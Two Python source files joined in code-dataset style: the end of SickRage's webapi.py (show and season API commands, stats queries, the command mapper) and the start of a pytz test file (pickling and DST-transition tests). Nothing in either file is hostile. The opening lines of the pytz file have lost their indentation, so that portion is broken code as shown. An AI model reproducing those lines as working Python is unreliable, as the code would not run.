        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Return the distinct season numbers of a show, sorted per the "sort" parameter. """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        myDB = db.DBConnection(row_type="dict")
        # the sort direction is validated by check_params, so it is safe to
        # splice into the ORDER BY clause
        direction = "ASC" if self.sort == "asc" else "DESC"
        sqlResults = myDB.select("SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season " + direction,
                                 [self.indexerid])
        season_numbers = [int(row["season"]) for row in sqlResults]
        return _responds(RESULT_SUCCESS, season_numbers)
class CMD_ShowSeasons(ApiCall):
    _help = {
        "desc": "Get the list of episodes for one or all seasons of a show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "season": {"desc": "The season number"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        self.season, args = self.check_params(args, kwargs, "season", None, False, "int", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the list of episodes for one or all seasons of a show.

        When no season is given, returns {season: {episode: row}}; when a
        season is given, returns {episode: row} for that season only.
        """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        myDB = db.DBConnection(row_type="dict")
        if self.season is None:  # fixed: was "== None" — use identity test for None
            sqlResults = myDB.select(
                "SELECT name, episode, airdate, status, release_name, season, location, file_size, subtitles FROM tv_episodes WHERE showid = ?",
                [self.indexerid])
            seasons = {}
            for row in sqlResults:
                # replace the composite status with readable status/quality strings
                status, quality = Quality.splitCompositeStatus(int(row["status"]))
                row["status"] = _get_status_Strings(status)
                row["quality"] = get_quality_string(quality)
                # convert the stored airdate to the user's timezone and date format
                dtEpisodeAirs = sbdatetime.sbdatetime.convert_to_setting(
                    network_timezones.parse_date_time(row['airdate'], showObj.airs, showObj.network))
                row['airdate'] = sbdatetime.sbdatetime.sbfdate(dtEpisodeAirs, d_preset=dateFormat)
                curSeason = int(row["season"])
                curEpisode = int(row["episode"])
                del row["season"]
                del row["episode"]
                if curSeason not in seasons:  # fixed: was "not curSeason in"
                    seasons[curSeason] = {}
                seasons[curSeason][curEpisode] = row
        else:
            sqlResults = myDB.select(
                "SELECT name, episode, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND season = ?",
                [self.indexerid, self.season])
            # fixed: was "len(sqlResults) is 0" — "is" on an int literal relies
            # on CPython's small-int cache; use truthiness instead
            if not sqlResults:
                return _responds(RESULT_FAILURE, msg="Season not found")
            seasons = {}
            for row in sqlResults:
                curEpisode = int(row["episode"])
                del row["episode"]
                status, quality = Quality.splitCompositeStatus(int(row["status"]))
                row["status"] = _get_status_Strings(status)
                row["quality"] = get_quality_string(quality)
                dtEpisodeAirs = sbdatetime.sbdatetime.convert_to_setting(
                    network_timezones.parse_date_time(row['airdate'], showObj.airs, showObj.network))
                row['airdate'] = sbdatetime.sbdatetime.sbfdate(dtEpisodeAirs, d_preset=dateFormat)
                # fixed: removed the redundant "seasons[curEpisode] = {}" that
                # was immediately overwritten by the assignment below
                seasons[curEpisode] = row
        return _responds(RESULT_SUCCESS, seasons)
class CMD_ShowSetQuality(ApiCall):
    _help = {
        "desc": "Set the quality setting of a show. If no quality is provided, the default user setting is used.",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "initial": {"desc": "The initial quality of the show"},
            "archive": {"desc": "The archive quality of the show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # this for whatever reason removes hdbluray not sdtv... which is just wrong. reverting to previous code.. plus we didnt use the new code everywhere.
        # self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list", _getQualityMap().values()[1:])
        self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
                                               ["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
                                                "fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
        self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
                                               ["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
                                                "fullhdwebdl",
                                                "hdbluray", "fullhdbluray"])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Set the quality setting of a show. If no quality is provided, the default user setting is used. """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        # map the API's lowercase quality names onto the internal Quality codes
        quality_map = {'sdtv': Quality.SDTV,
                       'sddvd': Quality.SDDVD,
                       'hdtv': Quality.HDTV,
                       'rawhdtv': Quality.RAWHDTV,
                       'fullhdtv': Quality.FULLHDTV,
                       'hdwebdl': Quality.HDWEBDL,
                       'fullhdwebdl': Quality.FULLHDWEBDL,
                       'hdbluray': Quality.HDBLURAY,
                       'fullhdbluray': Quality.FULLHDBLURAY,
                       'unknown': Quality.UNKNOWN}
        # the user default quality acts as a failsafe
        new_quality = int(sickbeard.QUALITY_DEFAULT)
        initial_qualities = [quality_map[q] for q in self.initial] if self.initial else []
        archive_qualities = [quality_map[q] for q in self.archive] if self.archive else []
        if initial_qualities or archive_qualities:
            new_quality = Quality.combineQualities(initial_qualities, archive_qualities)
        showObj.quality = new_quality
        return _responds(RESULT_SUCCESS,
                         msg=showObj.name + " quality has been changed to " + get_quality_string(showObj.quality))
class CMD_ShowStats(ApiCall):
    # API command: per-show episode statistics broken down by status/quality.
    _help = {
        "desc": "Get episode statistics for a given show",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }
    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Get episode statistics for a given show """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        # show stats
        # counters for plain (non-composite) statuses; downloaded/snatched
        # variants are tracked separately below
        episode_status_counts_total = {}
        episode_status_counts_total["total"] = 0
        for status in statusStrings.statusStrings.keys():
            if status in [UNKNOWN, DOWNLOADED, SNATCHED, SNATCHED_PROPER, ARCHIVED]:
                continue
            episode_status_counts_total[status] = 0
        # add all the downloaded qualities
        episode_qualities_counts_download = {}
        episode_qualities_counts_download["total"] = 0
        for statusCode in Quality.DOWNLOADED + Quality.ARCHIVED:
            status, quality = Quality.splitCompositeStatus(statusCode)
            if quality in [Quality.NONE]:
                continue
            episode_qualities_counts_download[statusCode] = 0
        # add all snatched qualities
        episode_qualities_counts_snatch = {}
        episode_qualities_counts_snatch["total"] = 0
        for statusCode in Quality.SNATCHED + Quality.SNATCHED_PROPER:
            status, quality = Quality.splitCompositeStatus(statusCode)
            if quality in [Quality.NONE]:
                continue
            episode_qualities_counts_snatch[statusCode] = 0
        myDB = db.DBConnection(row_type="dict")
        # season 0 (specials) is deliberately excluded from the stats
        sqlResults = myDB.select("SELECT status, season FROM tv_episodes WHERE season != 0 AND showid = ?",
                                 [self.indexerid])
        # the main loop that goes through all episodes
        for row in sqlResults:
            status, quality = Quality.splitCompositeStatus(int(row["status"]))
            episode_status_counts_total["total"] += 1
            if status in Quality.DOWNLOADED + Quality.ARCHIVED:
                episode_qualities_counts_download["total"] += 1
                episode_qualities_counts_download[int(row["status"])] += 1
            elif status in Quality.SNATCHED + Quality.SNATCHED_PROPER:
                episode_qualities_counts_snatch["total"] += 1
                episode_qualities_counts_snatch[int(row["status"])] += 1
            elif status == 0:  # we dont count NONE = 0 = N/A
                pass
            else:
                episode_status_counts_total[status] += 1
        # the outgoing container
        episodes_stats = {}
        episodes_stats["downloaded"] = {}
        # turning codes into strings
        for statusCode in episode_qualities_counts_download:
            if statusCode == "total":
                episodes_stats["downloaded"]["total"] = episode_qualities_counts_download[statusCode]
                continue
            status, quality = Quality.splitCompositeStatus(int(statusCode))
            # normalize e.g. "720p HDTV" -> "720p_hdtv" for the JSON keys
            statusString = Quality.qualityStrings[quality].lower().replace(" ", "_").replace("(", "").replace(")", "")
            episodes_stats["downloaded"][statusString] = episode_qualities_counts_download[statusCode]
        episodes_stats["snatched"] = {}
        # turning codes into strings
        # and combining proper and normal
        for statusCode in episode_qualities_counts_snatch:
            if statusCode == "total":
                episodes_stats["snatched"]["total"] = episode_qualities_counts_snatch[statusCode]
                continue
            status, quality = Quality.splitCompositeStatus(int(statusCode))
            statusString = Quality.qualityStrings[quality].lower().replace(" ", "_").replace("(", "").replace(")", "")
            # snatched and snatched-proper share a key, so accumulate
            if Quality.qualityStrings[quality] in episodes_stats["snatched"]:
                episodes_stats["snatched"][statusString] += episode_qualities_counts_snatch[statusCode]
            else:
                episodes_stats["snatched"][statusString] = episode_qualities_counts_snatch[statusCode]
        # episodes_stats["total"] = {}
        for statusCode in episode_status_counts_total:
            if statusCode == "total":
                episodes_stats["total"] = episode_status_counts_total[statusCode]
                continue
            status, quality = Quality.splitCompositeStatus(int(statusCode))
            statusString = statusStrings.statusStrings[statusCode].lower().replace(" ", "_").replace("(", "").replace(
                ")", "")
            episodes_stats[statusString] = episode_status_counts_total[statusCode]
        return _responds(RESULT_SUCCESS, episodes_stats)
class CMD_ShowUpdate(ApiCall):
    _help = {
        "desc": "Update a show in SickRage",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Queue a forced update of the show from its indexer. """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        try:
            sickbeard.showQueueScheduler.action.updateShow(showObj, True)  # @UndefinedVariable
        except CantUpdateShowException as e:
            logger.log("API::Unable to update show: {0}".format(str(e)), logger.DEBUG)
            return _responds(RESULT_FAILURE, msg="Unable to update " + str(showObj.name))
        return _responds(RESULT_SUCCESS, msg=str(showObj.name) + " has queued to be updated")
class CMD_Shows(ApiCall):
    # Metadata served by the "help" API command.
    _help = {
        "desc": "Get all shows in SickRage",
        "optionalParameters": {
            "sort": {"desc": "The sorting strategy to apply to the list of shows"},
            "paused": {"desc": "True to include paused shows, False otherwise"},
        },
    }

    def __init__(self, args, kwargs):
        # required
        # optional
        self.sort, args = self.check_params(args, kwargs, "sort", "id", False, "string", ["id", "name"])
        self.paused, args = self.check_params(args, kwargs, "paused", None, False, "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get all shows in SickRage """
        shows = {}
        for show in sickbeard.showList:
            # Honour the optional "paused" filter when it was supplied.
            if self.paused is not None and bool(self.paused) != bool(show.paused):
                continue

            indexer_ids = helpers.mapIndexersToShow(show)
            entry = {
                "paused": (0, 1)[show.paused],
                "quality": get_quality_string(show.quality),
                "language": show.lang,
                "air_by_date": (0, 1)[show.air_by_date],
                "sports": (0, 1)[show.sports],
                "anime": (0, 1)[show.anime],
                "indexerid": show.indexerid,
                "tvdbid": indexer_ids[1],
                "network": show.network,
                "show_name": show.name,
                "status": show.status,
                "subtitles": (0, 1)[show.subtitles],
            }

            # Render the next airdate in the configured display timezone/format.
            if show.nextaired:
                air_dt = sbdatetime.sbdatetime.convert_to_setting(
                    network_timezones.parse_date_time(show.nextaired, show.airs, entry['network']))
                entry['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(air_dt, d_preset=dateFormat)
            else:
                entry['next_ep_airdate'] = ''

            entry["cache"] = CMD_ShowCache((), {"indexerid": show.indexerid}).run()["data"]
            if not entry["network"]:
                entry["network"] = ""

            # Key the result dict by name or by indexer id, as requested.
            key = show.name if self.sort == "name" else show.indexerid
            shows[key] = entry

        return _responds(RESULT_SUCCESS, shows)
class CMD_ShowsStats(ApiCall):
    _help = {"desc": "Get the global shows and episodes statistics"}
    def __init__(self, args, kwargs):
        # required
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Get the global shows and episodes statistics """
        stats = {}
        myDB = db.DBConnection()
        today = str(datetime.date.today().toordinal())
        stats["shows_total"] = len(sickbeard.showList)
        # "Active" = not paused and not in a terminal ("Ended"/"Unknown") status.
        stats["shows_active"] = len(
            [show for show in sickbeard.showList if show.paused == 0 and "Unknown" not in show.status and "Ended" not in show.status])
        # NOTE(review): the IN (...) lists below are joined from internal
        # integer status codes (Quality.*), not user input, so the string
        # concatenation is not an injection vector here.
        stats["ep_downloaded"] = myDB.select("SELECT COUNT(*) FROM tv_episodes WHERE status IN (" + ",".join(
            [str(show) for show in Quality.DOWNLOADED + Quality.ARCHIVED]) + ") AND season != 0 and episode != 0 AND airdate <= " + today + "")[0][0]
        stats["ep_snatched"] = myDB.select("SELECT COUNT(*) FROM tv_episodes WHERE status IN (" + ",".join(
            [str(show) for show in Quality.SNATCHED + Quality.SNATCHED_PROPER]) + ") AND season != 0 and episode != 0 AND airdate <= " + today + "")[0][0]
        # assumes airdate == 1 marks an unknown/unaired placeholder — TODO confirm
        stats["ep_total"] = myDB.select("SELECT COUNT(*) FROM tv_episodes WHERE season != 0 AND episode != 0 AND (airdate != 1 OR status IN (" + ",".join(
            [str(show) for show in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.ARCHIVED]) + ")) AND airdate <= " + today + " AND status != " + str(IGNORED) + "")[0][0]
        return _responds(RESULT_SUCCESS, stats)
# WARNING: never define a cmd call string that contains a "_" (underscore)
# this is reserved for cmd indexes used while cmd chaining
# WARNING: never define a param name that contains a "." (dot)
# this is reserved for cmd namespaces used while cmd chaining
# Maps public API command names to their handler classes (see the
# warnings above about characters reserved for command chaining).
function_mapper = {
    # general
    "help": CMD_Help,
    "future": CMD_ComingEpisodes,
    # episode commands
    "episode": CMD_Episode,
    "episode.search": CMD_EpisodeSearch,
    "episode.setstatus": CMD_EpisodeSetStatus,
    "episode.subtitlesearch": CMD_SubtitleSearch,
    "exceptions": CMD_Exceptions,
    # history / queue commands
    "history": CMD_History,
    "history.clear": CMD_HistoryClear,
    "history.trim": CMD_HistoryTrim,
    "failed": CMD_Failed,
    "backlog": CMD_Backlog,
    "logs": CMD_Logs,
    # application-level ("sb") commands
    "sb": CMD_SickBeard,
    "postprocess": CMD_PostProcess,
    "sb.addrootdir": CMD_SickBeardAddRootDir,
    "sb.checkversion": CMD_SickBeardCheckVersion,
    "sb.checkscheduler": CMD_SickBeardCheckScheduler,
    "sb.deleterootdir": CMD_SickBeardDeleteRootDir,
    "sb.getdefaults": CMD_SickBeardGetDefaults,
    "sb.getmessages": CMD_SickBeardGetMessages,
    "sb.getrootdirs": CMD_SickBeardGetRootDirs,
    "sb.pausebacklog": CMD_SickBeardPauseBacklog,
    "sb.ping": CMD_SickBeardPing,
    "sb.restart": CMD_SickBeardRestart,
    "sb.searchindexers": CMD_SickBeardSearchIndexers,
    "sb.searchtvdb": CMD_SickBeardSearchTVDB,
    "sb.searchtvrage": CMD_SickBeardSearchTVRAGE,
    "sb.setdefaults": CMD_SickBeardSetDefaults,
    "sb.update": CMD_SickBeardUpdate,
    "sb.shutdown": CMD_SickBeardShutdown,
    # single-show commands
    "show": CMD_Show,
    "show.addexisting": CMD_ShowAddExisting,
    "show.addnew": CMD_ShowAddNew,
    "show.cache": CMD_ShowCache,
    "show.delete": CMD_ShowDelete,
    "show.getquality": CMD_ShowGetQuality,
    "show.getposter": CMD_ShowGetPoster,
    "show.getbanner": CMD_ShowGetBanner,
    "show.getnetworklogo": CMD_ShowGetNetworkLogo,
    "show.getfanart": CMD_ShowGetFanArt,
    "show.pause": CMD_ShowPause,
    "show.refresh": CMD_ShowRefresh,
    "show.seasonlist": CMD_ShowSeasonList,
    "show.seasons": CMD_ShowSeasons,
    "show.setquality": CMD_ShowSetQuality,
    "show.stats": CMD_ShowStats,
    "show.update": CMD_ShowUpdate,
    # multi-show commands
    "shows": CMD_Shows,
    "shows.stats": CMD_ShowsStats
}
| WebSpider/SickRage | sickbeard/webapi.py | Python | gpl-3.0 | 117,264 |
# -*- coding: ascii -*-
import sys, os, os.path
import unittest, doctest
try:
import cPickle as pickle
except ImportError:
import pickle
from datetime import datetime, time, timedelta, tzinfo
import warnings
if __name__ == '__main__':
# Only munge path if invoked as a script. Testrunners should have setup
# the paths already
sys.path.insert(0, os.path.abspath(os.path.join(os.pardir, os.pardir)))
import pytz
from pytz import reference
from pytz.tzfile import _byte_string
from pytz.tzinfo import DstTzInfo, StaticTzInfo
# I test for expected version to ensure the correct version of pytz is
# actually being tested.
EXPECTED_VERSION='2012d'
# Canonical datetime rendering used throughout these tests.
fmt = '%Y-%m-%d %H:%M:%S %Z%z'
# Zero timedelta, compared against utcoffset()/dst() results.
NOTIME = timedelta(0)
# GMT is a tzinfo.StaticTzInfo--the class we primarily want to test--while
# UTC is reference implementation. They both have the same timezone meaning.
UTC = pytz.timezone('UTC')
GMT = pytz.timezone('GMT')
assert isinstance(GMT, StaticTzInfo), 'GMT is no longer a StaticTzInfo'
def prettydt(dt):
    """Render *dt* as 'YYYY-MM-DD HH:MM:SS TZNAME +offset'.

    strftime is deliberately avoided because it cannot handle years
    earlier than 1900, per http://bugs.python.org/issue1777412
    """
    delta = dt.utcoffset()
    # Negative offsets are rendered by negating the timedelta, since
    # str() of a negative timedelta is unreadable ('-1 day, ...').
    if delta < timedelta(0):
        offset = '-%s' % (-1 * delta,)
    else:
        offset = '+%s' % (delta,)
    fields = (dt.year, dt.month, dt.day,
              dt.hour, dt.minute, dt.second,
              dt.tzname(), offset)
    return '%04d-%02d-%02d %02d:%02d:%02d %s %s' % fields
# Python 2/3 compatibility shim for the unicode() builtin.
try:
    unicode
except NameError:
    # Python 3.x doesn't have unicode(), making writing code
    # for Python 2.3 and Python 3.x a pain.
    unicode = str
class BasicTest(unittest.TestCase):
    """Sanity checks of core pytz behaviour (version, UTC/GMT, lookups)."""
    def testVersion(self):
        # Ensuring the correct version of pytz has been loaded
        self.assertEqual(EXPECTED_VERSION, pytz.__version__,
                'Incorrect pytz version loaded. Import path is stuffed '
                'or this test needs updating. (Wanted %s, got %s)'
                % (EXPECTED_VERSION, pytz.__version__)
                )
    def testGMT(self):
        # GMT (StaticTzInfo) must be interchangeable with the UTC singleton.
        now = datetime.now(tz=GMT)
        self.assertTrue(now.utcoffset() == NOTIME)
        self.assertTrue(now.dst() == NOTIME)
        self.assertTrue(now.timetuple() == now.utctimetuple())
        self.assertTrue(now==now.replace(tzinfo=UTC))
    def testReferenceUTC(self):
        now = datetime.now(tz=UTC)
        self.assertTrue(now.utcoffset() == NOTIME)
        self.assertTrue(now.dst() == NOTIME)
        self.assertTrue(now.timetuple() == now.utctimetuple())
    def testUnknownOffsets(self):
        # This tzinfo behavior is required to make
        # datetime.time.{utcoffset, dst, tzname} work as documented.
        dst_tz = pytz.timezone('US/Eastern')
        # This information is not known when we don't have a date,
        # so return None per API.
        self.assertTrue(dst_tz.utcoffset(None) is None)
        self.assertTrue(dst_tz.dst(None) is None)
        # We don't know the abbreviation, but this is still a valid
        # tzname per the Python documentation.
        self.assertEqual(dst_tz.tzname(None), 'US/Eastern')
    def clearCache(self):
        # Reach into pytz's private cache so lookups below are "cold".
        pytz._tzinfo_cache.clear()
    def testUnicodeTimezone(self):
        # We need to ensure that cold lookups work for both Unicode
        # and traditional strings, and that the desired singleton is
        # returned.
        self.clearCache()
        eastern = pytz.timezone(unicode('US/Eastern'))
        self.assertTrue(eastern is pytz.timezone('US/Eastern'))
        self.clearCache()
        eastern = pytz.timezone('US/Eastern')
        self.assertTrue(eastern is pytz.timezone(unicode('US/Eastern')))
class PicklingTest(unittest.TestCase):
    """Pickle round-trip tests: unpickling must return the same singletons."""
    def _roundtrip_tzinfo(self, tz):
        # A pickled tzinfo must unpickle to the identical singleton object.
        p = pickle.dumps(tz)
        unpickled_tz = pickle.loads(p)
        self.assertTrue(tz is unpickled_tz, '%s did not roundtrip' % tz.zone)
    def _roundtrip_datetime(self, dt):
        # Ensure that the tzinfo attached to a datetime instance
        # is identical to the one returned. This is important for
        # DST timezones, as some state is stored in the tzinfo.
        tz = dt.tzinfo
        p = pickle.dumps(dt)
        unpickled_dt = pickle.loads(p)
        unpickled_tz = unpickled_dt.tzinfo
        self.assertTrue(tz is unpickled_tz, '%s did not roundtrip' % tz.zone)
    def testDst(self):
        # Exercise every localized variant of a DST timezone.
        tz = pytz.timezone('Europe/Amsterdam')
        dt = datetime(2004, 2, 1, 0, 0, 0)
        for localized_tz in tz._tzinfos.values():
            self._roundtrip_tzinfo(localized_tz)
            self._roundtrip_datetime(dt.replace(tzinfo=localized_tz))
    def testRoundtrip(self):
        dt = datetime(2004, 2, 1, 0, 0, 0)
        for zone in pytz.all_timezones:
            tz = pytz.timezone(zone)
            self._roundtrip_tzinfo(tz)
    def testDatabaseFixes(self):
        # Hack the pickle to make it refer to a timezone abbreviation
        # that does not match anything. The unpickler should be able
        # to repair this case
        tz = pytz.timezone('Australia/Melbourne')
        p = pickle.dumps(tz)
        tzname = tz._tzname
        hacked_p = p.replace(_byte_string(tzname), _byte_string('???'))
        self.assertNotEqual(p, hacked_p)
        unpickled_tz = pickle.loads(hacked_p)
        self.assertTrue(tz is unpickled_tz)
        # Simulate a database correction. In this case, the incorrect
        # data will continue to be used.
        p = pickle.dumps(tz)
        new_utcoffset = tz._utcoffset.seconds + 42
        # Python 3 introduced a new pickle protocol where numbers are stored in
        # hexadecimal representation. Here we extract the pickle
        # representation of the number for the current Python version.
        old_pickle_pattern = pickle.dumps(tz._utcoffset.seconds)[3:-1]
        new_pickle_pattern = pickle.dumps(new_utcoffset)[3:-1]
        hacked_p = p.replace(old_pickle_pattern, new_pickle_pattern)
        self.assertNotEqual(p, hacked_p)
        unpickled_tz = pickle.loads(hacked_p)
        self.assertEqual(unpickled_tz._utcoffset.seconds, new_utcoffset)
        self.assertTrue(tz is not unpickled_tz)
    def testOldPickles(self):
        # Ensure that applications serializing pytz instances as pickles
        # have no troubles upgrading to a new pytz release. These pickles
        # where created with pytz2006j
        east1 = pickle.loads(_byte_string(
            "cpytz\n_p\np1\n(S'US/Eastern'\np2\nI-18000\n"
            "I0\nS'EST'\np3\ntRp4\n."
            ))
        east2 = pytz.timezone('US/Eastern')
        self.assertTrue(east1 is east2)
        # Confirm changes in name munging between 2006j and 2007c cause
        # no problems.
        pap1 = pickle.loads(_byte_string(
            "cpytz\n_p\np1\n(S'America/Port_minus_au_minus_Prince'"
            "\np2\nI-17340\nI0\nS'PPMT'\np3\ntRp4\n."))
        pap2 = pytz.timezone('America/Port-au-Prince')
        self.assertTrue(pap1 is pap2)
        gmt1 = pickle.loads(_byte_string(
            "cpytz\n_p\np1\n(S'Etc/GMT_plus_10'\np2\ntRp3\n."))
        gmt2 = pytz.timezone('Etc/GMT+10')
        self.assertTrue(gmt1 is gmt2)
class USEasternDSTStartTestCase(unittest.TestCase):
    """Probe tzname/utcoffset/dst around a single timezone transition.

    Subclasses override the class attributes to test other transitions:
    the test methods sample instants before, at, and after
    ``transition_time`` and compare against the ``before``/``after``
    expectation dicts.
    """
    tzinfo = pytz.timezone('US/Eastern')

    # UTC instant of the 2002 US DST changeover (02:00 EST -> 03:00 EDT);
    # testTransition below expects the `after` values at exactly this time.
    transition_time = datetime(2002, 4, 7, 7, 0, 0, tzinfo=UTC)

    # Increase for 'flexible' DST transitions due to 1 minute granularity
    # of Python's datetime library
    instant = timedelta(seconds=1)

    # Expected local-time values before the transition.
    before = {
        'tzname': 'EST',
        'utcoffset': timedelta(hours=-5),
        'dst': timedelta(hours=0),
    }

    # Expected local-time values on/after the transition.
    after = {
        'tzname': 'EDT',
        'utcoffset': timedelta(hours=-4),
        'dst': timedelta(hours=1),
    }

    def _test_tzname(self, utc_dt, wanted):
        """Assert the localized tzname of *utc_dt* matches *wanted*."""
        tzname = wanted['tzname']
        dt = utc_dt.astimezone(self.tzinfo)
        self.assertEqual(dt.tzname(), tzname,
            'Expected %s as tzname for %s. Got %s' % (
                tzname, str(utc_dt), dt.tzname()
                )
            )

    def _test_utcoffset(self, utc_dt, wanted):
        """Assert the localized utcoffset of *utc_dt* matches *wanted*."""
        utcoffset = wanted['utcoffset']
        dt = utc_dt.astimezone(self.tzinfo)
        self.assertEqual(
            dt.utcoffset(), wanted['utcoffset'],
            'Expected %s as utcoffset for %s. Got %s' % (
                utcoffset, utc_dt, dt.utcoffset()
                )
            )

    def _test_dst(self, utc_dt, wanted):
        """Assert the localized dst() of *utc_dt* matches *wanted*."""
        dst = wanted['dst']
        dt = utc_dt.astimezone(self.tzinfo)
        self.assertEqual(dt.dst(), dst,
            'Expected %s as dst for %s. Got %s' % (
                dst, utc_dt, dt.dst()
                )
            )

    def test_arithmetic(self):
        """Datetime arithmetic must round-trip across the transition."""
        utc_dt = self.transition_time
        for days in range(-420, 720, 20):
            delta = timedelta(days=days)
            # Make sure we can get back where we started
            dt = utc_dt.astimezone(self.tzinfo)
            dt2 = dt + delta
            dt2 = dt2 - delta
            self.assertEqual(dt, dt2)
            # Make sure arithmetic crossing DST boundaries ends
            # up in the correct timezone after normalization
            utc_plus_delta = (utc_dt + delta).astimezone(self.tzinfo)
            local_plus_delta = self.tzinfo.normalize(dt + delta)
            self.assertEqual(
                prettydt(utc_plus_delta),
                prettydt(local_plus_delta),
                'Incorrect result for delta==%d days. Wanted %r. Got %r'%(
                    days,
                    prettydt(utc_plus_delta),
                    prettydt(local_plus_delta),
                    )
                )

    def _test_all(self, utc_dt, wanted):
        """Run all three checks (utcoffset, tzname, dst) at *utc_dt*."""
        self._test_utcoffset(utc_dt, wanted)
        self._test_tzname(utc_dt, wanted)
        self._test_dst(utc_dt, wanted)

    def testDayBefore(self):
        self._test_all(self.transition_time - timedelta(days=1), self.before)

    def testTwoHoursBefore(self):
        self._test_all(self.transition_time - timedelta(hours=2), self.before)

    def testHourBefore(self):
        self._test_all(self.transition_time - timedelta(hours=1), self.before)

    def testInstantBefore(self):
        self._test_all(self.transition_time - self.instant, self.before)

    def testTransition(self):
        self._test_all(self.transition_time, self.after)

    def testInstantAfter(self):
        self._test_all(self.transition_time + self.instant, self.after)

    def testHourAfter(self):
        self._test_all(self.transition_time + timedelta(hours=1), self.after)

    def testTwoHoursAfter(self):
        # Fixed copy-and-paste bug: this previously used timedelta(hours=1),
        # merely duplicating testHourAfter.
        self._test_all(self.transition_time + timedelta(hours=2), self.after)

    def testDayAfter(self):
        self._test_all(self.transition_time + timedelta(days=1), self.after)
class USEasternDSTEndTestCase(USEasternDSTStartTestCase):
    """US/Eastern fall-back transition (EDT -> EST), 2002-10-27."""
    tzinfo = pytz.timezone('US/Eastern')
    transition_time = datetime(2002, 10, 27, 6, 0, 0, tzinfo=UTC)
    before = {
        'tzname': 'EDT',
        'utcoffset': timedelta(hours = -4),
        'dst': timedelta(hours = 1),
    }
    after = {
        'tzname': 'EST',
        'utcoffset': timedelta(hours = -5),
        'dst': timedelta(hours = 0),
    }
class USEasternEPTStartTestCase(USEasternDSTStartTestCase):
    """1945 switch from Eastern War Time (EWT) to Eastern Peace Time (EPT);
    offset and dst are unchanged, only the abbreviation flips."""
    transition_time = datetime(1945, 8, 14, 23, 0, 0, tzinfo=UTC)
    before = {
        'tzname': 'EWT',
        'utcoffset': timedelta(hours = -4),
        'dst': timedelta(hours = 1),
    }
    after = {
        'tzname': 'EPT',
        'utcoffset': timedelta(hours = -4),
        'dst': timedelta(hours = 1),
    }
class USEasternEPTEndTestCase(USEasternDSTStartTestCase):
    """End of Eastern Peace Time (EPT -> EST), 1945-09-30."""
    transition_time = datetime(1945, 9, 30, 6, 0, 0, tzinfo=UTC)
    before = {
        'tzname': 'EPT',
        'utcoffset': timedelta(hours = -4),
        'dst': timedelta(hours = 1),
    }
    after = {
        'tzname': 'EST',
        'utcoffset': timedelta(hours = -5),
        'dst': timedelta(hours = 0),
    }
class WarsawWMTEndTestCase(USEasternDSTStartTestCase):
    # In 1915, Warsaw changed from Warsaw to Central European time.
    # This involved the clocks being set backwards, causing a end-of-DST
    # like situation without DST being involved.
    tzinfo = pytz.timezone('Europe/Warsaw')
    transition_time = datetime(1915, 8, 4, 22, 36, 0, tzinfo=UTC)
    before = {
        'tzname': 'WMT',
        'utcoffset': timedelta(hours=1, minutes=24),
        'dst': timedelta(0),
    }
    after = {
        'tzname': 'CET',
        'utcoffset': timedelta(hours=1),
        'dst': timedelta(0),
    }
class VilniusWMTEndTestCase(USEasternDSTStartTestCase):
    # At the end of 1916, Vilnius changed timezones putting its clock
    # forward by 11 minutes 35 seconds. Neither timezone was in DST mode.
    tzinfo = pytz.timezone('Europe/Vilnius')
    # Wider "instant" than the default to absorb the sub-minute offset.
    instant = timedelta(seconds=31)
    transition_time = datetime(1916, 12, 31, 22, 36, 00, tzinfo=UTC)
    before = {
        'tzname': 'WMT',
        'utcoffset': timedelta(hours=1, minutes=24),
        'dst': timedelta(0),
    }
